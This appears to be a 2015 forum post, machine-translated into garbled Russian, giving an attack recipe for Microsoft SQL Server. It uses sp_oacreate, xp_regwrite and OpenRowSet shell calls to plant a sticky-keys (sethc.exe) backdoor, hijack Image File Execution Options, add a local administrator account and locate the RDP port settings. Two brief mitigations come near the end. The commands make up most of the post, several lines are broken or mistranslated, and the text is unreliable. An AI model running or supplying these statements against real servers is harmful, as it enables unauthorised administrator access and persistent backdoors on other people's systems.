Итак, ключевой момент ниже — использовать две SQL-инструкции для копирования файла проводника системы в файл Shift backdoor системы, и следующие два оператора выполняются отдельно.
Это утверждение копирует explorer.exe как sethc.exe
declare @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
Этот оператор копирует sethc.exe в каталог dllcache
Declare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe';
Остальные два оператора используют sp_oacreate хранящиеся процедуры, которые требуют odsole70.dll файла, поэтому сохранение этого файла связано с успехом его создания.
(2), xpsql.cpp: Ошибка 5 из CreateProcess (строка 737)
Эта ситуация сложнее, и об этом говорят в Интернете
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Я проверил песочницу, чтобы поднять права на этот вопрос, но по моей практике этот процент успеха очень низок, потому что большинство серверов удалили c:\windows\system32\ias\ias.mdb. Затем можно попробовать захват изображений, Sethc, конечно, захват изображения тоже условный, 1 должен существовать xp_regwrite этой хранимой процедуре 2 — это 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Отладчик не удаляется
Сначала можно узнать, был ли захвачен прикреплённый ключ реестра
Исполнительный мастер... xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Если запрос не находит проблему, доказательство удаляется, и при запросе sethc.exe невозможно выполнить команду sql
ИСПОЛНИТЕЛЬНЫЙ мастер... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Отладчик',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
После пяти подключений к терминалу и переключения он сразу переходит на рабочий стол, а затем добавляет его вручную.
Реестр изменяет терминальный порт
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Что касается предотвращения захвата изображений, это в основном достигается следующими методами:
★ Закон о ограничении разрешений
Если пользователь больше не имеет доступа к ключу реестра, он не может изменить эти параметры. Откройте редактор реестра и перейдите в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, выберите этот элемент, кликнете правой кнопкой мыши — > права — > расширено, и уменьшите права администратора и пользователей системы (здесь нужно просто отменить операцию записи).
★ Метод быстрой резки грязной конопли ножом
Откройте редактор реестра и перейдите в панель
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Проблему можно решить, напрямую удалив элемент Опции исполнения файла изображения.
Команда SQL захватывает закреплённый ключ в реестре, бэкдор
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ',''C:\WINDOWS\system32\kdsn.exe'
Загрузка программного обеспечения:Туристы, если вы хотите увидеть скрытое содержание этого поста, пожалуйста Ответ
|
Опубликовано 18.03.2015 10:36:56
|
|
|
|
Опубликовано 19.03.2015 20:26:09
|
